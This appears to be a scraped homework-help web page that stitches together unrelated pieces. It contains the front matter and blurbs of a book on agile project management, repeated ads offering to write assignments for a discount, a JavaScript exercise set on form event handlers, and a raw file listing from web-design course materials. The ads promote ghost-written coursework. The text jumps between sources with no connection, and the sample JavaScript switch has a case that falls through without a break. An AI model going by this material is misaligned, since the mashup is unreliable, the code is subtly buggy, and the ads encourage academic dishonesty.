All rights reserved. Printed in the United States of America. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, write to:

Pearson Education, Inc Rights and Contracts Department 501 Boylston Street, Suite 900 Boston, MA 02116 Fax (617) 671 3447

This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/).

ISBN-13: 978-0-321-65839-5

Text printed in the United States on recycled paper at RR Donnelley, Crawfordsville,

 

 

Indiana.

First printing July 2009

Dedication To Wendie, Debbie, and Nikki

 

 

 

 

Agile Computing Software Engineering Jim Highsmith Addison-Wesley Professional Agile Project Management: Creating Innovative Products, Second Edition

 

 

Praise for Jim Highsmith’s Agile Project Management, Second Edition “This second edition is a remarkable palimpsest that overlays critical enterprise aspects such as scaling agile, governing agile projects, and measuring agile performance onto its original, award-winning agile project management foundation. If you’re an agile manager or executive seeking a holistic understanding as well as the critical details of agile project management—this edition will be a very valuable addition to your bookshelf.”

—Sanjiv Augustine, President, LitheSpeed and Author of Managing Agile Projects

“Jim continues to successfully communicate complex project management concepts and interactions in an easily digestible manner. The breadth and depth of practical agile experience, insight, and guidance is immense. In typical fashion, he tempers ‘agile religion’ with the reality that agile development is not right for every situation or everyone.”

—Robert Holler, President and CEO of VersionOne

“This book is one of the very best on the topic of agile methods for project management, offering profound concepts and actionable guidelines. Stressing the need to abandon the old paradigm of “following a plan with minimal changes,” in favor of “adapting successfully to inevitable changes,” this book is one of those rare books suitable for both novice and seasoned project managers.”

—Alexander Laufer, Director, Center for Project Leadership, Columbia University author, Breaking the Code of Project Management

“Jim’s second edition is a timely update that extends this decade’s progress to the Project and Program Managers making the transition to agile project management. This edition expands on the topics of governance and performance management, helping PMs shape new models of adaptability, serving teams and continuous value delivery. It addresses the critical questions that PMs face in release planning, backlog preparation, capacity planning, and risk reduction. Jim knows how to talk to project managers, detailing agile phases that lead to adaptable learning and creating greater value in spite of high expectations and constraints. This is the one handbook on agile project management I would recommend for any business or technical leader who has a hand in the agile community.”

—Ryan Martens, CTO & Founder, Rally Software

“Envisioning a different way of working begins with a shift in thinking. Jim Highsmith shares an exciting vision and the new way of thinking behind the Agile Revolution in his latest book, Agile Project Management. Through storytelling and examples, Jim draws us into appreciating a new way of fostering creativity and innovation. This is required reading for anyone looking for a fresh perspective that can change the

 

 

way teams develop new products.

Antoine de Saint-Exupery once said, ‘If you want to build a ship, don’t drum up people together to collect wood and don’t assign them tasks and work, but rather teach them to long for the endless immensity of the sea.’ Agile Project Management helps us chart a course along those lines. There’s no doubt that great products and a new way of how teams work together will be the result.”

—Michael Mah, Director, Benchmarking Practice, Cutter Consortium and Managing Partner, QSM Associates Inc.

“I have always considered the first edition of Jim Highsmith’s Agile Project Management to be the source for information on agile project management and good project management in general. In the second edition, Jim has done a great job of extending coverage to the key aspects of spreading agile thinking to portfolio management and the rest of the organization. Again, a must have for a project, program, or portfolio manager’s book shelf.”

—Kent J. McDonald, Program Manager

“It’s been almost twenty years since Jim and I first started to collaborate. Jim was always fond of saying that more has been written about Software Development than is known. In this second edition of Agile Project Management, Jim’s writing has finally caught up with all that needs to be known. The rest is up to you and your experiences.”

—Sam Bayer, Ph.D., CEO b2b2dot0

“When Jim’s first APM book hit the shelves five years ago it added much needed structure to project and product release planning levels. His APM principles and practices have been widely and successfully adopted worldwide. In this edition Jim adds many new insights, values, principles, and practices based on his extensive experience helping large enterprises scale their agility across projects, programs, products, and divisions. This latest edition is chock full of valuable new ideas and practical applications.”

—Ken Collier, Ph.D., Agile Consultant and Author

“In this new mainstream world of agile adoption, Jim walks a wonderful and generous line for new and seasoned project managers alike. Jim still has the beginner agile project manager in mind, offering his very clear ideas backed by immediately applicable practices. He continues his agnostic view of agile by sticking to tools for the project manager, regardless of any particular agile framework or method. In this second edition, Jim has remained vigilant to the agile project manager’s success, adding thought-provoking guidance for the bigger agile world.”

—Jean Tabaka, Agile Fellow, Rally Software

 

 

“No one makes agile project management as clear, compelling, and real as Jim Highsmith—and without coming off as a cheerleader. His models of agile project management just make sense and important—no, essential—agile nuggets can be found on every page. In particular, Chapter 13, “Beyond Scope, Schedule, and Cost: Measuring Agile Performance,” is required reading. I’m recommending it to all my clients. So read Agile Project Management if you value performance over politics.”

—Christopher Avery, Ph.D., Leadership Mentor, www.ChristopherAvery.com

“Jim challenges conventional wisdom and provides excellent examples of the leadership mindset shifts needed to successfully implement Agile Project Management for products. A must read for all product and project managers.”

—Ron Holliday, Vice President, Financial Services, Fidelity Investments

“There is no better source of wisdom on agile project management than Highsmith’s second edition. A master of explaining all sides of a story, Highsmith helps you understand exactly why traditional project management fails to deliver in a competitive world and how agile management provides a faster, more adaptive and customer-focused process. I love Jim’s real-world stories of companies that are thriving with agile, his in-depth coverage of essential agile management practices, and his innovative ideas on agile governance.”

—Joshua Kerievsky, Founder, Industrial Logic, Inc.

 

 

 

 

 

Agile Computing Software Engineering Jim Highsmith Addison-Wesley Professional Agile Project Management: Creating Innovative Products, Second Edition

 

 

Praise for Jim Highsmith’s Agile Project Management “Jim Highsmith is one of a few modern writers who are helping us understand the new nature of work in the knowledge economy. A transition—from industrial-age thinking to management more suited to reliable innovation—is well underway. But few people yet understand the implications of this shift. Agile Project Management explains what’s going on with startling clarity. Perhaps more importantly, it provides the vital management structure and practical advice that will support ongoing innovation in your company.”

—Rob Austin, Assistant Professor, Harvard Business School

“There is a lot of attention these days being given to whether organizations are harvesting the maximum benefits from their IT investments. This book is totally in alignment with that theme and should be a must-read for all project participants who are passionate about their projects delivering ‘value for money.’

“The one constant in the vast majority of large projects I see in my role as Project Management Practice Manager for Fujitsu Consulting is change. Yet, true to the observations that Jim has made in this book, the majority of these projects have been executed as if change is not the norm and as if the project initiators were ‘seers’ who could foretell the future with a high degree of certainty. These projects were run on the basis of traditional project management practices, where, simplistically speaking, the project plan was ‘king,’ and performance was measured and couched in terms of ‘delivery to plan.’

“In the past 12–18 months, Fujitu Consulting has seen the potential benefits of adopting more ‘Agile’ approaches in the way we deliver and manage some of our projects and have encouraged our clients to embrace an ‘adaptive’ project culture.”

—Karen Chivers, Senior Consulting Director and Project Management Practice Manager, Fujitsu Consulting (Asia Pacific)

“There is a common set of values that all the Agile methods share, and, in this book, Jim Highsmith uses those values plus his knowledge of the Agile methods to present a common framework for Agile project management. Jim shows us what an Agile approach to project management is about—the essential insights and experiences—plus he expertly combines tools and techniques with proven project management value, those of his own and those from other methods, into this framework.”

—Jeff De Luca, Project Director, Nebulon Pty. Ltd. (Australia)

“Jim’s book, Agile Project Management, addresses one of the key questions asked when adopting an Agile software development methodology, ‘How do you manage the project?’ He spends a lot of time on the values and principles needed to be successful in a less bureaucratic development environment. It requires individual discipline and a substantial mindset shift by all parties. He has done an excellent job

 

 

of documenting the behaviors that will create a winning team, no matter what process is being used. I applaud Jim for creating a book that will help take the Agile movement to a new level.”

—Christine Davis, Visiting Scientist, Carnegie Melon University/former Executive Vice President and General Manager, Raytheon

“Welcome to the second generation of Agile methodologies! Agile Project Management is an Agile methodology thoughtfully built on the key ideas and experiences of other AMs. The result is a coherent whole, from principles to practices. If your job is to deliver serious software, keep this book at hand on your library, since in the next ten years you will use it too many times!”

—Michele Marchesi, Professor of Software Engineering, University of Cagliari, Italy

“The world of product development is becoming more dynamic and uncertain. Many managers cope by reinforcing processes, adding documentation, or further honing costs. This isn’t working. Highsmith brilliantly guides us into an alternative that fits the times.”

—Preston G. Smith, Founder and Principal of New Product Dynamics/Coauthor, Developing Products in Half the Time

“Finally a book that reconciles the passion of the Agile software movement with the needed disciplines of project management. Jim’s book has provided a service to all of us.

“Agile software development is largely a grass-roots movement that focuses on reliably delivering software products in a dynamic world. To date, much of the Agile literature has focused on the engineering practices that support an Agile philosophy, and thus the coverage of project management has been limited. In this book, Jim Highsmith addresses project management in the Agile environment. He doesn’t limit this coverage to simply making a case for a new style of project management. Rather, Jim also offers a practical framework and supporting practices that project managers can use to help software development teams be more productive and reliably deliver products that add business value.”

—Neville R(oy) Singham, CEO, ThoughtWorks, Inc.

“Software development is a human activity, although we sometimes try to deny that fact by wrapping high ceremony processes and tools around our teams which, if unleashed, can produce some truly amazing things. Jim knows this all too well from his broad experience in working with a variety of projects, and that experience shines through in this very pragmatic and much needed take on Agile project management.”

—Grady Booch, IBM Fellow

 

 

“Agile methods, whether for software development, project management, or general product development, are the ideal approach for building things where change is a risk factor. Everywhere? Highsmith clearly shows how iterative development methods can be successfully applied to project management generally. It is truly groundbreaking when methods refined in the software space can actually inform other disciplines.”

—Charles Stack, Founder and CEO, Flashline, Inc.

“This is the project management book we’ve all been waiting for—the book that effectively combines Agile methods and rigorous project management. Not only does this book help us make sense of project management in this current world of iterative, incremental Agile methods, but it’s an all-around good read!

“Many IT organizations have made a mess of Agile methods and component development. Organizations that abandoned waterfall methods for undisciplined software hacking have given Agile methods a bad reputation in some businesses. A cure for these woes can be found in Jim Highsmith’s new book. You really can combine the benefits of Agile methods with project management disciplines. Jim shows us the way.”

—Lynne Ellyn, Senior VP & CIO, DTE Energy

“Jim Highsmith’s Agile Project Management is a refreshing change in the flow of project management books being published today. The book combines project management theory and practice cast in common-sense terms in a manner valuable to both the student and user. The author’s recasting and renaming of the phases of a project life cycle adds an approach likely to be emulated in the future literature in this discipline.

“His treatment of the general principles to be followed in the Agile Revolution for new product development provides a model of behavior valuable to the enlightened scholar and practitioner of the project management process.”

—Dr. David I. Cleland, Professor Emeritus, Industrial Engineering Department, School of Engineering, University of Pittsburgh

“Product development in the 21st century must move from the world of structure and compliance to one of agility and rapid learning. As a result, project management must change from the administration of tasks to the flexible balancing of possibilities against constraints—’managing on the edge of chaos,’ as the author puts it. This book explains the process of doing just that and should be the foundation for change—readable, full of logic, and a sound process.”

—Michael Kennedy, President, Product Development Solutions/Author, Product Development for the Lean Enterprise

“This is a wonderful and highly practical book. Within hours of putting it down I was

 

 

putting some of its advice into practice. It’s a highly thought-provoking book that argues, for instance, that agility is more attitude than process and more environment than methodology. Because of the complexity of today’s software projects, one new product development project can rarely be viewed as a repeat of a prior project. This makes Highsmith’s advice to favor a reliable process over a repeatable one particularly timely and important.”

—Mike Cohn, President, Mountain Goat Software/Author, User Stories Applied: For Agile Software Development

“Jim’s book removes the mystery around Agile project management and its associated techniques while providing a framework of discipline that can be easily applied to any high-tech development and is not limited to software development.”

—Ken Delcol, Director, Product Development, MDS SCIEX

“Iterations are clearly the best way to create the innovative products that customers want to buy. Agile Project Management contains a wealth of ideas and insights about how to make a flexible product development process work.”

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

This Is A Javascript Assignment

This is a Javascript assignment – 6 questions.

 

5.2

 

rewrite the below document to assign the event handler to the event property of the button element. This requires the chosen color to be obtained from the value property of the button element rather than through the parameter.

this is the HTML document

 

<!DOCTYPE html>

<!– 5.1.hmtl

A document for color_click.js

–>

<html lang = “en”>

<head>

<title> 5.1.html </title>

<meta charset = “utf-8” />

<script type = “text/javascript”  src = “color_click.js” >

</script>

</head>

<body>

<h4> Favorite Color </h4>

<form id = “myForm”  action = “”>

<p>

<label> <input type = “radio”  name = “colorButton”

value = “10”

onclick = “colorChoice(10)” />

Color red </label>

<br />

<label> <input type = “radio”  name = “colorButton”

value = “20”

onclick = “colorChoice(20)” />

Color blue </label>

<br />

<label> <input type = “radio”  name = “colorButton”

value = “30”

onclick = “colorChoice(30)” />

Color green </label>

<br />

<label> <input type = “radio”  name = “colorButton”

value = “40”

onclick = “colorChoice(40)” />

Color yellow </label>

<br />

<label> <input type = “radio”  name = “colorButton”

value = “50”

onclick = “colorChoice(50)” />

Color orange </label>

</p>

</form>

</body>

</html>

 

(this is the JS external file)

// color_click.js

//   An example of the use of the click event with radio buttons,

//   registering the event handler by assignment to the button

//   attributes

 

 

// The event handler for a radio button collection

 

function colorChoice (color) {

 

// Produce an alert message about the chosen airplane

 

switch (color) {

case 10:

alert(“Favorite color red”);

break;

case 20:

alert(“Favorite color blue”);

break;

case 30:

alert(“Favorite color green”);

break;

case 40:

alert(“Favorite color yellow”);

case 50:

alert(“Favorite color Orange”);

break;

default:

alert(“Error in JavaScript function colorChoice”);

break;

}

}

 

 

5.3 Develop and test an HTML Document that has checkboxes for apple (59 cents each), oranges (49 cents each), and Banana (39 cents each), along with a submit button. each of the checkboxes should have its own o’clock event handler. these handlers must add the cost of their fruit to a total cost. An Event handler for the submit button must produce an alert window with the message your total cost is $xx, where xxx is the total cost of the chosen fruit, including 5% sales tax. this handler8 must return false (to avoid actual submission of the form data).

 

5.4

develop and test an HTML document that is similar to exercise 5.3. in this case use test boxes rather than checkboxes. these text boxes take a number which is the purchase number of the particular fruit. the rest of the document should behave exactly like that of exercise 5.3

 

5.5

Add reality checks to the text boxes of the document in exercise 5.4. the checks on the text box inputs should ensure that the input values are numbers in the range from 0 to 99

 

5.6

Range checks for element inputs can be represented as new properties of the object that represents the element. Modify the document in excesses 5.5 to add a max property value of 99 and a min property value of 0. Your event handler must use the properties for the range checks on values input through the text boxes.

 

5.7

Develop and test an html document that collects the following information from the user: Last name, first name, middle initial, age (restricted to be greater than 17), and weight (restricted to the range from 80 to 300). You must have event handlers for the form elements that collect this information. This handlers must check the input data for correctness. message in an alert windows must be produced when errors are detected.

 

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

HTML Programming Exercise Assignment

HTML Programming Exercise Assignment

LWD5e_materials/ch07/.DS_Store

__MACOSX/LWD5e_materials/ch07/._.DS_Store

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/index.html

Blackstone Bistro Gallery

Not is our food good, it’s also good-looking! Our patrons often stop to admire our fare with a quick Instagram before digging in. We’ve collected a few of our favorite shots here.

Our Baked Goods

We start our day at the crack of dawn to bake our own muffins, bread, and dinner rolls. Loaves not used that day are donated to the local food shelter.

Our Burgers

People come from all over to enjoy our lovingly made burgers. We grind our own locally-sourced organic beef and turkey so you know it’s fresh and free from fillers and other nonsense. Go for one of our creative topping combos or stick with the classics.

Catch of the Day

Our chef works with local fisherman to pick the freshest the sea has to offer for our daily seafood special. Our Roast Cod Caponata with Roasted Potatoes is an old favorite with our regulars.

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/._index.html

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/._.DS_Store

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/bread-1200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._bread-1200.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/bread-400.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._bread-400.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._.DS_Store

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/fish-1200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._fish-1200.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/burgers-400.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._burgers-400.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/fish-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._fish-800.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/burgers-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._burgers-800.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/fish-400.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._fish-400.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/bread-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._bread-800.jpg

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/burgers-1200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/images/._burgers-1200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/._images

LWD5e_materials/ch07/Exercise 07-03/responsivegallery/index copy.html

Blackstone Bistro Gallery

Not is our food good, it’s also good-looking! Our patrons often stop to admire our fare with a quick Instagram before digging in. We’ve collected a few of our favorite shots here.

Our Baked Goods

We start our day at the crack of dawn to bake our own muffins, bread, and dinner rolls. Loaves not used that day are donated to the local food shelter.

Our Burgers

People come from all over to enjoy our lovingly made burgers. We grind our own locally-sourced organic beef and turkey so you know it’s fresh and free from fillers and other nonsense. Go for one of our creative topping combos or stick with the classics.

Catch of the Day

Our chef works with local fisherman to pick the freshest the sea has to offer for our daily seafood special. Our Roast Cod Caponata with Roasted Potatoes is an old favorite with our regulars.

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/responsivegallery/._index copy.html

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/._responsivegallery

LWD5e_materials/ch07/Exercise 07-03/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-03/._.DS_Store

__MACOSX/LWD5e_materials/ch07/._Exercise 07-03

LWD5e_materials/ch07/Exercise 07-02/svg/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/._.DS_Store

LWD5e_materials/ch07/Exercise 07-02/svg/blackgoose-logo.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/._blackgoose-logo.svg

LWD5e_materials/ch07/Exercise 07-02/svg/icons/github-icon.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/icons/._github-icon.svg

LWD5e_materials/ch07/Exercise 07-02/svg/icons/tumblr.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/icons/._tumblr.svg

LWD5e_materials/ch07/Exercise 07-02/svg/icons/instagram.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/icons/._instagram.svg

LWD5e_materials/ch07/Exercise 07-02/svg/icons/facebook.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/icons/._facebook.svg

LWD5e_materials/ch07/Exercise 07-02/svg/icons/twitter.svg

 

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/icons/._twitter.svg

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/._icons

LWD5e_materials/ch07/Exercise 07-02/svg/blackgoosebistro.html

Black Goose logo Black Goose Bistro

The Restaurant

The Black Goose Bistro offers casual lunch and dinner fare in a relaxed atmosphere. The menu changes regularly to highlight the freshest local ingredients.

Catering

You have fun. We’ll handle the cooking. Black Goose Catering can handle events from snacks for a meetup to elegant corporate fundraisers.

Location and Hours

Seekonk, Massachusetts; Monday through Thursday 11am to 9pm; Friday and Saturday, 11am to midnight

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/._blackgoosebistro.html

LWD5e_materials/ch07/Exercise 07-02/svg/blackgoose.png

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/svg/._blackgoose.png

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/._svg

LWD5e_materials/ch07/Exercise 07-02/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-02/._.DS_Store

__MACOSX/LWD5e_materials/ch07/._Exercise 07-02

LWD5e_materials/ch07/Exercise 07-01/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/._.DS_Store

LWD5e_materials/ch07/Exercise 07-01/gallery/index.html

Black Goose Bistro Gallery

Not is our food good, it’s also good-looking! Our patrons often stop to admire our fare with a quick Instagram before digging in. We’ve collected a few of our favorite shots here.

Our Baked Goods

close-up of sliced rustic bread We start our day at the crack of dawn to bake our own muffins, bread, and dinner rolls. Loaves not used that day are donated to the local food shelter.

Our Burgers

People come from all over to enjoy our lovingly made burgers. We grind our own locally-sourced organic beef and turkey so you know it’s fresh and free from fillers and other nonsense. Go for one of our creative topping combos or stick with the classics.

Catch of the Day

Our chef works with local fisherman to pick the freshest the sea has to offer for our daily seafood special. Our Roast Cod Caponata with Roasted Potatoes is an old favorite with our regulars.

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._index.html

LWD5e_materials/ch07/Exercise 07-01/gallery/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._.DS_Store

LWD5e_materials/ch07/Exercise 07-01/gallery/bread.html

Gallery: Baked Goods

close-up of sliced rustic bread

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._bread.html

LWD5e_materials/ch07/Exercise 07-01/gallery/fish.html

Gallery: Catch of the Day

 

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._fish.html

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._.DS_Store

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/tabouleh-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._tabouleh-800.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/fish-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._fish-800.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/burgers-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._burgers-800.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/fries-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._fries-800.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/bread-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._bread-800.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/photos/chicken-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/photos/._chicken-800.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._photos

LWD5e_materials/ch07/Exercise 07-01/gallery/burgers.html

Gallery: The Best Burgers

 

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._burgers.html

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/bread-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._bread-200.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/.DS_Store

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._.DS_Store

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/chicken-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._chicken-200.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/burgers-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._burgers-200.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/fries-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._fries-200.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/tabouleh-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._tabouleh-200.jpg

LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/fish-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/thumbnails/._fish-200.jpg

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/gallery/._thumbnails

__MACOSX/LWD5e_materials/ch07/Exercise 07-01/._gallery

__MACOSX/LWD5e_materials/ch07/._Exercise 07-01

LWD5e_materials/ch07/finished exercises/svg/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/._.DS_Store

LWD5e_materials/ch07/finished exercises/svg/blackgoose-logo.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/._blackgoose-logo.svg

LWD5e_materials/ch07/finished exercises/svg/icons/github-icon.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/icons/._github-icon.svg

LWD5e_materials/ch07/finished exercises/svg/icons/tumblr.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/icons/._tumblr.svg

LWD5e_materials/ch07/finished exercises/svg/icons/instagram.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/icons/._instagram.svg

LWD5e_materials/ch07/finished exercises/svg/icons/facebook.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/icons/._facebook.svg

LWD5e_materials/ch07/finished exercises/svg/icons/twitter.svg

 

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/icons/._twitter.svg

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/._icons

LWD5e_materials/ch07/finished exercises/svg/blackgoosebistro.html

Black Goose Bistro

The Restaurant

The Black Goose Bistro offers casual lunch and dinner fare in a relaxed atmosphere. The menu changes regularly to highlight the freshest local ingredients.

Catering

You have fun. We’ll handle the cooking. Black Goose Catering can handle events from snacks for a meetup to elegant corporate fundraisers.

Location and Hours

Seekonk, Massachusetts; Monday through Thursday 11am to 9pm; Friday and Saturday, 11am to midnight

Please visit our social media pages

twitter facebook instagram

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/._blackgoosebistro.html

LWD5e_materials/ch07/finished exercises/svg/blackgoose.png

__MACOSX/LWD5e_materials/ch07/finished exercises/svg/._blackgoose.png

__MACOSX/LWD5e_materials/ch07/finished exercises/._svg

LWD5e_materials/ch07/finished exercises/responsivegallery/index.html

Blackstone Bistro Gallery

Not is our food good, it’s also good-looking! Our patrons often stop to admire our fare with a quick Instagram before digging in. We’ve collected a few of our favorite shots here.

Our Baked Goods

close-up of sliced rustic bread We start our day at the crack of dawn to bake our own muffins, bread, and dinner rolls. Loaves not used that day are donated to the local food shelter.

Our Burgers

juicy burgers on a cutting board People come from all over to enjoy our lovingly made burgers. We grind our own locally-sourced organic beef and turkey so you know it’s fresh and free from fillers and other nonsense. Go for one of our creative topping combos or stick with the classics.

Catch of the Day

baked fish with potatoes and cherry tomatoes Our chef works with local fisherman to pick the freshest the sea has to offer for our daily seafood special. Our Roast Cod Caponata with Roasted Potatoes is an old favorite with our regulars.

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/._index.html

LWD5e_materials/ch07/finished exercises/responsivegallery/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/._.DS_Store

LWD5e_materials/ch07/finished exercises/responsivegallery/images/bread-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._bread-200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/burgers-300.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._burgers-300.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/bread-1200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._bread-1200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/bread-400.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._bread-400.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._.DS_Store

LWD5e_materials/ch07/finished exercises/responsivegallery/images/fish-1200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._fish-1200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/burgers-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._burgers-200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/bread-300.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._bread-300.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/burgers-400.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._burgers-400.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/fish-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._fish-800.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/burgers-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._burgers-800.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/fish-400.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._fish-400.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/fish-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._fish-200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/bread-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._bread-800.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/burgers-1200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._burgers-1200.jpg

LWD5e_materials/ch07/finished exercises/responsivegallery/images/fish-300.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/images/._fish-300.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/responsivegallery/._images

__MACOSX/LWD5e_materials/ch07/finished exercises/._responsivegallery

LWD5e_materials/ch07/finished exercises/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/._.DS_Store

LWD5e_materials/ch07/finished exercises/gallery/index.html

Blackstone Bistro Gallery

Not is our food good, it’s also good-looking! Our patrons often stop to admire our fare with a quick Instagram before digging in. We’ve collected a few of our favorite shots here.

